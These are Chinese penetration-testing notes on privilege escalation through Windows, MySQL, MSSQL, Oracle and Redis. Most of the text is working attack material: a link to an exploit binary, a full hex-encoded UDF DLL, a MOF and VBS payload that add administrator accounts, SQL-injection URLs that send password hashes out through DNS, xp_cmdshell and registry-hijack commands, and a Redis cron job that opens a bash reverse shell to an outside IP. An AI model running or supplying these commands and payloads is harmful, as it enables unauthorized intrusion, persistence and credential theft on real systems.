后台权限，网站权限，数据库权限，接口权限，系统权限，域控权限等

后台权限：（获得方式：爆破，注入猜解，弱口令等获取的帐号密码配合登录）

一般网站或应用后台只能操作应用的界面内容数据图片等信息，无法操作程序的源代码或服务器上

的资源文件的。（如后台功能存在文件操作的话也可以操作文件数据）

网站权限：（获得方式：以上三种思路获取）

查看或修改程序源代码，可以进行网站或应用的配置文件读取（接口配置信息，数据库配置信息等），

还能收集服务器操作系统相关的信息，为后续系统提权做准备。

数据库权限：

操作数据库的权限，数据库的增删改等，源码或配置文件泄漏，也可能是网站权限(webshell)进行的

数据库配置文件读取获得。

接口权限：（邮件，短信，支付，第三方登录等）

后台或网站权限后的获取途径：后台（修改配置信息功能点），网站权限（查看的配置文件获取），

具体可以操作的事情大家自己想想。

https://blog.csdn.net/weixin_50464560/article/details/116541159
开启3389：
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭3389：
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

Windows提权

Win溢出及AT&SC&PS提权

补充：dll劫持

win溢出cve-2020-0787

几乎是windows系列通杀，本地提权https://blog.csdn.net/xuandao_ahfengren/article/details/106907644

https://hub.fastgit.xyz/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases/download/1/BitsArbitraryFileMoveExploit.exe

直接把exe放在对面cmd中执行即可

AT&SC&PS

AT提权（win 2003）

at 13:15 /interactive cmd.exe

作用：将administrator提升至system32

这个administrator是用户的最高权限。就像你是房子主管机器人的主人。 system32权限是系统的最高权限，就像房子的主管机器人。

SC提权（win7,win2008,win2003）

sc Create syscmd binPath= "cmd /K start" type= own type= interact

sc start syscmd

作用：将administrator提升至system32

PS提权（win2003,win2008）

psexec.exe -accepteula -s -i -d cmd.exe

五次shift键提权

在windows的某些低版本操作系统，比如2003，在登录页面按下五次shift键会弹出粘滞键，我们可以把这个替换成我们的cmd，那么当再次按下就会以system权限启动cmd

数据库提权

[

前提：得到数据库账号密码，除了access都可以提权

mysql的默认端口是3306
sqlserver默认端口号为：1433
oracle 默认端口号为：1521
DB2 默认端口号为：5000
PostgreSQL默认端口号为：5432

密码收集

最高权限密码

配置文件

读取网站数据库配置文件（了解其命名规则及查找技巧）：sql data inc config conn database common include

存储文件

读取数据库存储或备份文件：了解其数据库存储格式及对应内容

@@basedir/data/数据库名/表名.MYD

比如mysql的数据库存储在mysql下的user

show variables like '%dir%';

数据库文件默认在：cd /usr/share/mysql
配置文件默认在：/etc/my.cnf

数据库目录：/var/lib/mysql/
配置文件：/usr/share/mysql(mysql.server命令及配置文件)
相关命令：/usr/bin(mysqladmin、mysqldump等命令)(*mysql的一种安全启动方式：/usr/bin/mysqld_safe –user=root &)
启动脚本：/etc/rc.d/init.d/

暴力破解

如果是root权限（默认不支持外连），那么可以把爆破脚本（配合对方服务器语言）放在对方那里爆破，否则账户和密码都要爆破

PS：我个人觉得根本用不到暴力破解，配置文件上直接就找到账号密码了

mysql提权

UDF提权

创建dll文件，使用自定义函数

https://www.cnblogs.com/litlife/p/9030673.html

1.mysql<5.1 导出目录 c:\windows 或者 c:\windows\system32 目录下

2.mysql=>5.1 导出安装目录/lib/plugin/
    如果不存在/lib/plugin/目录，则手工创建 plugin 目录或利用 NTFS 流创建
步骤：
1. 将udf文件放到指定位置（Mysql>5.1放在Mysql根目录的lib\plugin文件夹下）
2. 从udf文件中引入自定义函数(user defined function)
3. 执行自定义函数

select version();
select @@basedir;

Mysql安装目录

show variables like "%char%";

https://www.sqlsec.com/2020/11/mysql.html#toc-heading-17

https://www.sqlsec.com/tools/udf.html

select sys_eval('dir');
CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';

sqlmap中存在udf文件：sqlmap\data\udf\mysql\windows\64

在sqlmap\extra\cloak目录中执行命令会在当前目录生成lib_mysqludf_sys.dll

python cloak.py -d -i D:\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_

攻击者可以利用lib_mysqludf_sys提供的函数执行系统命令

sys_eval，执行任意命令，并将输出返回。
sys_exec，执行任意命令，并将退出码返回。
sys_get，获取一个环境变量。
sys_set，创建或修改一个环境变量。

提权

secure_file_priv 是用来限制 load dumpfile、into  outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限

show global variables like 'secure%';
     当 secure_file_priv 的值为 NULL ，表示限制 mysqld 不允许导入|导出，此时无法提权
     当 secure_file_priv 的值为 /tmp/ ，表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下，此时也无法提权
     当 secure_file_priv 的值没有具体值时，表示不对 mysqld 的导入|导出做限制，此时可提权

如果 secure_file_priv没有具体的值，则可以写入导出文件
secure_file_priv 的值在MySQL数据库的安装目录的 my.ini 文件中配置

这意味着我们可以如果有修改文件的权限就可以修改它

0x443a5c73716c6d61705c646174615c7564665c6d7973716c5c77696e646f77735c36345c6c69625f6d7973716c7564665f7379732e646c6c

SELECT hex(load_file(0x443a5c73716c6d61705c646174615c7564665c6d7973716c5c77696e646f77735c36345c6c69625f6d7973716c7564665f7379732e646c6c)) into dumpfile 'F:\g.txt';

INSERT INTO udftmp values(unhex('4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000677CBFDA231DD189231DD189231DD18904DBBF89211DD18904DBBC892A1DD18904DBAA89261DD189231DD0890F1DD18904DBAC89211DD18904DBA089221DD18904DBAB89221DD18904DBA989221DD18952696368231DD189000000000000000000000000000000005045000064860300A727A15A0000000000000000F00022200B020800002000000010000000800000109F000000900000000000100000000000100000000200000400000000000000050002000000000000C000000010000000000000020000000000100000000000001000000000000000001000000000000010000000000000000000001000000098B2000008020000B0B10000E800000000B00000B00100000050000050010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000800000001000000000000000040000000000000000000000000000800000E0555058310000000000200000009000000012000000040000000000000000000000000000400000E02E727372630000000010000000B000000006000000160000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E393100555058210D240209E1E421439D3BDFB7DE7400000F0F0000002A0000490000D41DE9FEFF833A007450488B05A421000049890009A24008CD4973D20A9F109C1899CD9F34272096280FB70593666D83FDB7410B30B001C332C0C3CC00C215CC92C9BA810034716A6FEBCC16E46C096A471853FDBF1FA4631C0FB605591688401E41C7011E00FFED6DD62B8B63BF01750F3F42088338007506C64B26EBDC01017B4E2D632B05B9E4B228CE25227ED20CD26F1F28152AB001C3F66D7BC2BF83EC38344A43895C243084B7FFF6DBD90B09FF15C71F2B4885C04C8BD87512104C24DF6EAEB9608707202DC4388E897C242873EDCDFD33C048C7C1FF0033FBF2AE1C120976D9B75B1AF7D122E901890B2DCC00BE6FEB166F28E3026E404848DEDA7FDB29F938D87459488D0D40EE4E0E813832983DE4C1EB81403281480A9EE4435E4F81503281543281563261F37D4FB0018C48804028C34C49467607744E61DEED584917E49260680A703C6527CD18782056C740045CF8BF33B64342188B48048B008D4C010239BD1E77D27D8BD947107543706D8045EC1BE936130309884370900A00B69DEE10C8980A18BC0CB3C6B00E07103FBCB37DDB0F49A585C974066F5D17B7086D21CF93CF047424ADA3B9772D7110448B6949E2FA02C2EDDFBA52E2CE0212498D5C3001E83F0FFCE85CD7FDDD5FEBCB418B03C60430D2470D5734B70C58D7E22D0822D34313167BB75BCE2618007CA01CFF56677C84842F7198F4CF16C64373870D087C8C03D6E4240F79561E541E511E7292939C4E1E4B1E481E63C2425E3E1E1FCF2784EE87C71F1DA0981F4C89C68685EE44241824580F6C59897486BB86DB76381764BDB900D34C18284CB0DB7E302D4D8BF146E8E7B901EE9B6DC1EC04E00DDA4533ED4488670BEEF69B4FF04C39290F8413050673F215FDCFB8B9169125AC1C088BE8747B418D5508E1C9B6B13AC0E6CC177C7466A04B6640FA50669047FC3F42858E1B0B9529328D7936CE6F7D61C16C304375CD8CC74803C8F56636B724D470143E51C5BA08E1D9B68D39CC1CEB13225975AD886CDBB6F050EB258BC77004CD1930DDFE9CDB803E30E2154874229245FFB176D8827811FEF5887EDD4D174EBE5A0EEBC18424805EC606E71ADA0001380C4C38F12A10F8386C04C6F0A0581A87E792317FD3DC5CD8D6D09D58747A28F2023F73B773DF3E448D48406E41B80010B3748BD1F10DF7C7ED33C9AB441A5356104CEFA2DBE6B66C02C8D8154E1B8D54B94C350AEDE98D054A75890BA3B16E3B2DBC3133D2C7D0208925183BDF19B7B3BAD2C80DF2199D30AC581E29EB081433C0922FB384F13BE0064CEB0033C029001BB0DFB65538EC024510FF10C9196600FB6F7F6C900390483B0D89293F751148C1C11066F7DDDD6FDFB87502F3DAC1C910E9150AECCC405361203B8B7D1B5801A05FDCD25B0BFBEEF7F685DBC905112FD005020675098D430185BB76EFB6205B42C703D59B0D3C48B406634136670B1C5805B12006615BD85BC3CF55D27F6CC7C7C376FC608468E140DCFBF1C2C63831E83BE141BDD20F8503EE46BB7408075EE428073C0F8E0D8DE6B61B6E2BC58ED3105FDCFD3E76FB0FB12D602E0A741EF290B9E803C91D19BFDB36931D4275E841320783F802740FB9EF6DC3B31FB70ECA0208E2ED0D2F2E338E740FD2111912F874491412FC18DADC0B1FD958F847DF72165F1803B6BB2D701E4AD0C9EB081573ED12ECF6BEDBCF2774192D06429BD72D0698FBFB66D833DB891DB80E871DB906716FC7FEB59806E5413BD5DDE26541042530BB7DBBBD002C0978081E8BF3F048B93D883072B0B7920A63C7741AD64618D7D29B2F1C6B75E3EB037BF5A79A5ED6390C950CDAEB3FEA1F9F7DB7F08E8F080644892D312D1BC485C0678FED62771A15E5DE0DD6181ABE7FDDBBEEC7050725024585F67507B404BB833D14DDC96E73068B212A0B2D5C6F11DEDD264FE3029CF12C66012D3A273E9E9EBE10C58F38D240E468EC98717A60DCE91748C3B14D22190F6C20483A5ADBF308505851F0DD05BBEE77DF3D041F208915D12695D275133915D709ED7F38C3750B5A17C61E83FA017405040ADD6BE00275338931D39D08A3B71B0D34C84E20C574134AC68B07863DB9D7A64BFC1616E0C9016B3C1A0EDC83FFB092EBDA1535AB311BC11BDB5B0BD80C430C1DC817084D7BF787755C0B1841FFD385FF88FF03753970F79D75094A08AEEB8D1CA51E36EC648B171028ADEB06D8192ECC298ADC25F3008BC3659E8793708B218B8BF8B59D9E2A4055BF15EAA3894D7AFAB61B01018B080724B0D67D5D902DD9C2302F5E7D0AB1485825FF4DDB960C1E92387D2EDA02F101D7136FA3F875056C0CFCFA7D918844A4FD258B036983EB2F9E8E090CEFC6F852A1899E2681EC880068CD760DBFFE73153F156705B8C648F25845B7390CB8283D1F2C586170C339DEF61624EB754148B73DC6364238004044230430090E662FCF40280578254703055C73874C1C51494E7D4BB1077F4BF0EB222B8093447BDD837D738D0E83C00812D13E8D67DB7B642A059B240D20902F9C5BA25B701C2A7214097BC009CC3E1E666C926724766E833572DBFF0B70DC7A142F482C38B0BB2493827B8EF083D2396A14019B15650CCB36DC9255B624C80A271B83D76C1854BA6A234E336B1784F781C4ACA041592947A626231C0FD8CF53188186D9EF0D68295A4A148A8EF8ECECCDD64427CB1366EB75B908674B32D21DEA902D3A1C1128106464200A8B83AF334463971BCB36E418C323DB83A238243D05F62809993959B611402BDC678C90C136DE1BC3017F37320296247F15F4F6120D6276D81BC00383E8013C2075643F289C8D3D53041A787F4B8D1D4C068D13A08491790EC372B3326129A9EF4F137F2344720CC96681394D5A75FCB7C3FF174863513C813C0A5045E1137C0A180B020F94C063E343029F4C63413CFEC9B4EBED8D7ED24C03C1413C4014450458064525FFC25F6A4AB10018741F8B510B3BD2720A8B4108ED6FF8DB03C209D072104183C113C128453BCB72E16FC796B05D1CC1C3CF4CC1267AF7446992E1DA85DCBD1F4C2BC15FEAFB5ABED0140CCD0F3A24C1E81F600D2CFEF7D083E001EB02584FD644AB360196EBCAC0B66C3008EEC18B01A7FFAA128D3CC77627252205CC11CE78DCA606CB113F75463DA70FF0DD4603241B471EB801000000277C29847F3FE520000081BFF83C3DFC32A2DF2D992B7DC7F83074149D6FA3D00E7F5DC6268B2DC285586B212430BC6286B6489934E10AB9B4C856E04671D849460BB50E731C0EB110D9BE10A8D813FE6A4CB84C33DBCEB8FF00856037BA1623E9B8338975DDE016B1DF744D44D89C1D39B705DBDD8449F7D3093720D2FBDC4B4646463605DEE0E2E4B24746465E505A11000055C9A8AA298064547FB017D8069017303007D04E6F206172FFFFDFFE67756D656E7473096C6C6F77656420287564663A206C69625F6D79730BF6B7DD716C0D5F73085F696E666F29411C80EDFF232076657273696F6E20302E0134EDEDEE17A178706563744B657861076C79201A6DBB7DFB652073747243672074791B2070766175D8299B6D21724F2F7477996D60010B1F438EF6F603FB72206E616D4C436F756C246E6F74CCE8B66D3B63611320186D27796372FF850740310106023532023001240D0024F6FFB7FFD407001FC408001A740B15640C0010540B000B340A0004822776BBDCFE1918090018C40F13740E640B093427B763D4ED046217D41E5E3F1903241AEDBACF2C5007390F2A07801ABBDC6E8367165B16743711640C340B7BD85B770442130C390C01118350118B9B6DF705530133871C03E4001D5D90ED60430E057B743F09BAEEB0D80401072F67079403A06077DBC10701462F462B1074092F0DB6D94E3416033B01000715BB0BB6BD971574062F64F7DF21000884DDB640AE043439741F00BF20EEECEDB6140629034C341F0BA903E1C2DEBE240F05C305340A13234BD36D9B6E23431E14C45F0F470A75B713760554094B01098909A2071E7DE572BB1F1E742F12640D34870142B71582BB2E1311CF0C03CA96DD0E01380F387427005124A3AAFEC10246DDCD5D20D266D4FF555516C900178FA02A1B003011764BD56C039180BFA007E0126DD79DDD03703407F803680B0013026A76FBBA8603540B14021814170B581590FB2F07D9EEECF60A150310340727030034075BD5B9DD7003E0336F0724B3CC755DD7750B30074203AC0B9007F5B61B94DB03C03233920C1903C8BA05A0EB0B10074F8BE80B508375AFEB077303444707990BA0B65DD77507E503280BF0073A1C033C0038B7EB0B5007F71CA70B77B63BDB8B191D2F2007381DCB40071DAC7B5D83036C8307D30B601E9DED5EB3039B7C5F07C11E3BE0D0AE3BDB07031F3B1007D6039C33CA1255954A005525A3AAA8AA9251645455C9D09BA0887C0402C4FF16360157616974466F7253AC7F2B40FC6C654F626ABD14566972747561F63703C46C419A0D536574456E76126DBF01E26F6EE45661726961622B41EB2E40BC18437265B8546806640DF65BF76D47264375727222502A636573734914E283CD1226135469636BB6FD6E03026E6B517565727950036684DEDBB1F66D616E3716657218446973676FDBDBCF374C6962727879436192731A52746C633BB76D0970A2722D2C7874124CBDB5ADFD6F6F6B7570463EC26916B2747279DFB5078B17CD556E77E47E4973446562736F6BED75676763A7A56583E11DFEB6B77268616E64457883704046696CA56C85C58719F19319DAB61254176D65151153DAF6586B39352B537973176DFA81E87517454173426509A3DBFE434388A0895F616D73675FCC6990B3850BBF5F5F435F73708B6966285F7E267CDB766F5F64116F035F706F6922430B76DB2663DA5F64CE280009626B31142D325F7A13C417840B5F7B50705B6C735F330A6C212205DB5ACCD82A58096E73ED6BC982130FD76D643ED6BAD6DE756C343F15416D170CDEA3E0020AB52689A3B565C933A196063BC16DB15B0772652508661115080D5BA1739C29709F73149BB5ADB93932AE6E074D0F85D7BADBC56F736A663A70105E3B84ED70705831747B6D343FDF15F4C700F08C21180800E264860600A76EFB0FE327A15AE6F00022200B020808120CB07744B314132E0010000005CF1E6C9B02020433050002088000C302F663146D160100022E063AF76C650F0A50394330908DE8DB88223C1460E2D880D4BD0118020183703AACBB024B00303A011E4644A42B2E1054822D3BD810901200DC00B3DBC63B6F602E7264A76108550B53597761DD000C03162740022E26291B61F600D805100C22273616ECECC02E702850EB27244FD820FC007273726300136027B3C7013226650942FCA664B0702728421B4036C08D6D05CA7212D3060000000000009000FF0048894C240848895424104C8944241880FA010F854502000053565755488D35CDF0FFFF488DBE0080FFFF5731DB31C94883CDFFE85000000001DB7402F3C38B1E4883EEFC11DB8A16F3C3488D042F83F9058A1076214883FDFC771B83E9048B104883C00483E9048917488D7F0473EF83C1048A10741048FFC0881783E9018A10488D7F0175F0F3C3FC415BEB0848FFC6881748FFC78A1601DB750A8B1E4883EEFC11DB8A1672E68D410141FFD311C001DB750A8B1E4883EEFC11DB8A1673EB83E8037217C1E0080FB6D209D048FFC683F0FF0F843A0000004863E88D410141FFD311C941FFD311C9751889C183C00241FFD311C901DB75088B1E4883EEFC11DB73ED4881FD00F3FFFF11C1E83AFFFFFFEB835E4889F7B900120000B2004889FBEB2C8A074883C7013C80720A3C8F7706807FFE0F74062CE83C0177233817751F8B072500FFFFFF0FC829F801D8AB4883E9048A074883C70148FFC975D9EB0548FFC975BE4883EC28488DBE007000008B0709C0744F8B5F04488D8C30B0A100004801F34883C708FF96ECA1000048958A0748FFC708C074D74889F94889FAFFC8F2AE4889E9FF96F4A100004809C074094889034883C308EBD64883C4285D5F5E5B31C0C34883C4284883C704488D5EFC31C08A0748FFC709C074233CEF77114801C3488B03480FC84801F0488903EBE0240FC1E010668B074883C702EBE1488BAEFCA10000488DBE00F0FFFFBB00100000504989E141B8040000004889DA4889F94883EC20FFD5488D871702000080207F8060287F4C8D4C24204D8B014889DA4889F9FFD54883C4285D5F5E5B488D4424806A004839C475F94883EC804C8B442418488B542410488B4C2408E91F79FFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005CB0000054010000E404000000000000586000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564338302E435254222076657273696F6E3D22382E302E35303630382E30222070726F636573736F724172636869746563747572653D22616D64363422207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E0000000000000000000000002CB20000ECB1000000000000000000000000000039B200001CB20000000000000000000000000000000000000000000044B200000000000052B200000000000062B200000000000072B200000000000080B200000000000000000000000000008EB200000000000000000000000000004B45524E454C33322E444C4C004D5356435238302E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C46726565000000667265650000000000000000A727A15A0000000074B30000010000001200000012000000C0B2000008B3000050B300007010000060100000001000008015000060100000701500002014000060100000901300000014000060100000901300003011000060100000C010000000130000E0120000A011000089B300009FB30000BCB30000D7B30000E3B30000F6B3000007B4000010B4000020B400002EB4000037B4000047B4000055B400005DB400006CB4000079B4000081B4000090B4000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E69740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'));

select test into dumpfile 'D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin::$INDEX_ALLOCATION';

select 'xxxxxx' into dumpfile 'D:\\phpStudy\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin::$INDEX_ALLOCATION'

MOF

基于 MYSQL 特性的安全问题（估计只能在老版本windows上成功）

mof是windows系统的一个文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后，然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行，这个mof当中有一段是vbs脚本，这个vbs大多数的是cmd的添加管理员用户的命令。

提权的过程:

将mof上传至任意可读可写目录下，命名为：xishaonian.mof。

然后使用sql语句将系统当中默认的nullevt.mof给替换掉。进而让系统执行我们这个恶意的mof文件。

替换的sql语句：

select load_file('C:\Users\win10\Desktop\123\batman.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

mof文件代码如下所示：

#pragma namespace("\\\\.\\root\\subscription") 

instance of __EventFilter as $EventFilter 
{ 
    EventNamespace = "Root\\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 

instance of ActiveScriptEventConsumer as $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; 
}; 

instance of __FilterToConsumerBinding 
{ 
    Consumer   = $Consumer; 
    Filter = $EventFilter; 
};

启动项

win10的启动目录

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

mysql开启外连

mysql> update user set host='%' where user='root';
mysql> flush privileges;
GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost'
IDENTIFIED BY 'root' WITH GRANT OPTION;

用msf自带的exp打

vbscript启动项提权

create table a (cmd text);
insert into a values (“set wshshell=createobject (”“wscript.shell”") " );
insert into a values (“a=wshshell.run (”“cmd.exe /c net user iis_user 123!@#abcABC/add”",0) " );
insert into a values (“b=wshshell.run (”“cmd.exe /c net localgroup administrators iis_user /add”",0) " );
select * from a into outfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs”;

启动目录

C:\Users\batma\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

batma是自己电脑的用户名

直接可以写入开启rdp或者vnc之类的端口

或者win+r，输入shell:startup

Mysql开启外连

GRANT ALL PRIVILEGES ON . TO ‘root’@’%’ IDENTIFIED BY ‘root’ WITH GRANT OPTION;

msf

反弹shell

backshell函数

nc -l -p 5577

linux mysql backdoor

https://blog.csdn.net/weixin_33404102/article/details/113396881

Mysql BackDoor 是一款针对 PHP+Mysql 服务器开发的后门,该后门安装后为Mysql 增加一个可以执行系统命令的"state"函数,并且随 Mysql 进程启动一个基于 Dll 的嗅探型后门,这个后门在 Windows 下拥有与 Mysql 一样的系统权限,从而巧妙的实现了无端口,无进程,无服务的穿墙木马. 用法：将 Mysql.php 传到 PHP 服务器上,点击"自动安装 Mysql BackDoor"，然后直接执行命令即可。

MIX.DLL 提权

http://t.zoukankan.com/swane-p-2021732.html

1.在独立 IP 的 sqlmap 下运行

2.禁用本地缓存 net stop dns 3.http://localhost/inject.php?user=123’ and if((SELECT LOAD_FILE(CONCAT(’\’,(SELECT hex(user())),’.abc.com\foobar’))),1,1)%23 http://localhost/inject.php?user=123’ and if((SELECT LOADFILE(CONCAT(’\’,(SELECT concat(user,’’,mid(password,2,41)) from user where user=‘root’ limit 1),’.md5crack.cn\foobar’))),1,1)%23 https://sanwen8.cn/p/1acWt8J.html

dns突破提权

https://www.cnblogs.com/backlion/p/9888851.html

mssql提权

sql server是建立在windows上的

xp_cmdshell提权

在配置文件connectionstrings.config中得到用户名和密码，mssql默认支持外连

xp_cmdshell 默认在 mssql2000 中是开启的，在 mssql2005 之后的版本中则默认禁止。如果用户拥有

管理员 sa 权限则可以用 sp_configure 重修开启它。

启用：
EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
关闭：
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
reconfigure;
执行：
EXEC master.dbo.xp_cmdshell '命令'

如果 xp_cmdshell 被删除了，可以上传 xplog70.dll 进行恢复

exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\ProgramFiles\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'

sp_oacreate 提权

主要是用来调用 OLE 对象，利用 OLE 对象的 run 方法执行系统命令。

启用：
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;

关闭：
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE WITH OVERRIDE;

执行：
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'

sp_oamethod提权

和sp_oacreate提权都一样是组件

SQL Server 沙盒提权

--提权语句
exec sp_configure 'show advanced options',1;reconfigure;
-- 不开启的话在执行xp_regwrite会提示让我们开启，
exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
--关闭沙盒模式，如果一次执行全部代码有问题，先执行上面两句代码。
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
--查询是否正常关闭，经过测试发现沙盒模式无论是开，还是关，都不会影响我们执行下面的语句。
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'
--执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user margin margin /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators margin /add")')
沙盒模式SandBoxMode参数含义（默认是2）

0：在任何所有者中禁止启用安全模式
1 ：为仅在允许范围内
2 ：必须在access模式下
3：完全开启

openrowset是可以通过OLE DB访问SQL Server数据库，OLE DB是应用程序链接到SQL Server的的驱动程序。

--恢复配置

--exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;

--exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;

--exec sp_configure 'show advanced options',0;reconfigure;

JOB提权

首先需要启动sqlagent服务：

exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

然后创建任务X，这里x为任务名称，并执行命令，命令执行后的结果，将返回给文本文档q.txt

    use msdb

    exec sp_delete_job null,'x'

    exec sp_add_job 'x'

    exec sp_add_jobstep null,'x',null,'1','cmdexec','cmd /c "net user hack1 hack1 /add &net localgroup administrators hack1 /add>c:/q.txt"'

    exec sp_add_jobserver null,'x',@@servername

    exec sp_start_job 'x';

然后就可以看到已经创建了一个hack1的账户并加到了管理员组：

映像劫持

利用regwrite函数修改注册表，起到劫持作用：

EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:\windows\system32\cmd.exe'

然后检查是否劫持成功

    exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

返回没有问题 利用远程连接然后5次shift键，发现没有启动粘滞键，而是启动了cmd，然后就可以创建用户了

https://www.cnblogs.com/N0r4h/p/12889944.html

oracle提权

jsp网站后门不需要提权，自带system，配置文件sql.jsp

oracle dba权限判断

python sqlmap.py -u "" --dba

普通用户,DBA用户,注入模式

redis

https://blog.csdn.net/fly_hps/article/details/80937837

通过未授权或者密码进行登录

3.低权限写入webshell

1.计划任务反弹shell
服务器nc -lvvp 50050

root@kali:~# redis-cli -h 192.168.63.130
192.168.63.130:6379> set x "\n* * * * * bash -i >& /dev/tcp/124.70.20.10/50050 0>&1\n"
OK
192.168.63.130:6379> config set dir /var/spool/cron/
OK
192.168.63.130:6379> config set dbfilename root
OK
192.168.63.130:6379> save
OK

2.写入ssh公钥，利用私钥登录
条件：
    Redis服务使用ROOT账号启动
    服务器开放了SSH服务，而且允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器
本地生成公钥
root@kali:~/.ssh# ssh-keygen -t rsa
然后redis执行命令：
192.168.63.130:6379> config set dir /root/.ssh/
OK
192.168.63.130:6379> config set dbfilename authorized_keys
OK
